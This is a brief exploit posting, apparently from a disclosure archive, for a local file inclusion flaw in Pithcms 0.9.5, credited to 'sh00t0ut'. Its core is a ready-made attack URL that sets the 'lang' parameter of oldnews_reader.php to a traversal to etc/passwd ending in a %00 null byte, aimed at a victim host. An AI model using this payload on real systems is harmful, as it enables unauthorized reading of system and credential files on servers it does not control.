Pithcms version 0.9.5 suffers from a local file inclusion vulnerability.
a0b7c3d6c46c870cfb0f7e9f6d881958ba5e8941cb2be8e357e4f2fc9d1abb82
[~] Pithcms 0.9.5 Local Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/oldnews_reader.php?lang=[etc/passwd]%00